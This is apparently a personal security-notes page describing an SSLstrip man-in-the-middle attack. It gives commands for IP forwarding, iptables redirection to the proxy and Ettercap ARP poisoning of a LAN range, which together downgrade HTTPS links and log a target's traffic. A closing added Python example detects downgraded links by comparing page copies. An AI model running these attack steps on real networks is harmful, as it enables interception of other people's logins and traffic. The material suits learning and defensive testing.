akde/infosec

Information security is ultimately about managing risk


SSLstrip works as a proxy that replaces HTTPS references in HTTP, HTML, JS, … responses with their HTTP versions.

Installation: SSLstrip is old. Create a venv and install an older version of Twisted: venv/bin/pip install Twisted==18.9.0

Remove HTTPS references via MitM

Scenario:

  • You want $target to route all HTTP traffic through your own system.
  • Your system should remove each HTTPS reference.
  • You want to log all activity from $target.

Perform the following steps on your attacking system:

  1. Activate IP forwarding:
    # echo "1" > /proc/sys/net/ipv4/ip_forward
  2. Redirect all incoming traffic to port 80 to the SSLstrip proxy at 8080:
    # iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
  3. Start SSLstrip:
    root@imac2019-kali:/opt/sslstrip# venv/bin/python2.7 sslstrip.py -l 8080
  4. Start Ettercap and poison the target in the local network:
    # ettercap -TqM arp:remote /192.168.178.60-70// /192.168.178.60-70//
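
Seen from the defending side, the rewriting described at the top of this page (HTTPS references replaced with HTTP versions) shows up when a response received on the suspect network is compared with a copy of the same resource fetched over a trusted path. The following check is an added example, not part of the original page or of SSLstrip; the function names, the example.test host names and both sample bodies are constructed for illustration.

```python
import re

# Absolute http/https URLs as they appear in HTML, JS or header text.
URL_RE = re.compile(r"\b(https?)://([A-Za-z0-9.-]+(?::\d+)?)([^\s\"'<>)]*)", re.I)

def _schemes_by_target(body):
    """Map (host, path) -> set of schemes seen for that target in body."""
    body = body.replace("\\/", "/")  # JSON/JS often escapes slashes: https:\/\/
    seen = {}
    for scheme, host, path in URL_RE.findall(body):
        seen.setdefault((host.lower(), path), set()).add(scheme.lower())
    return seen

def find_downgraded_links(reference, observed):
    """Return https URLs from the reference copy that the observed copy
    carries only as http. Targets that are plain http in both are ignored."""
    ref = _schemes_by_target(reference)
    obs = _schemes_by_target(observed)
    return sorted(
        "https://%s%s" % target
        for target, schemes in ref.items()
        if schemes == {"https"} and obs.get(target) == {"http"}
    )

# Constructed sample: the page as served over a trusted path ...
REFERENCE = r'''<a href="https://login.example.test/signin">Sign in</a>
<form action="https://login.example.test/session" method="post">
<script>var api = "https:\/\/api.example.test\/v1";</script>
<img src="http://static.example.test/logo.png">'''

# ... and the same page as received on the network under test (constructed).
OBSERVED = r'''<a href="http://login.example.test/signin">Sign in</a>
<form action="http://login.example.test/session" method="post">
<script>var api = "http:\/\/api.example.test\/v1";</script>
<img src="http://static.example.test/logo.png">'''

if __name__ == "__main__":
    for url in find_downgraded_links(REFERENCE, OBSERVED):
        print("downgraded:", url)
```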
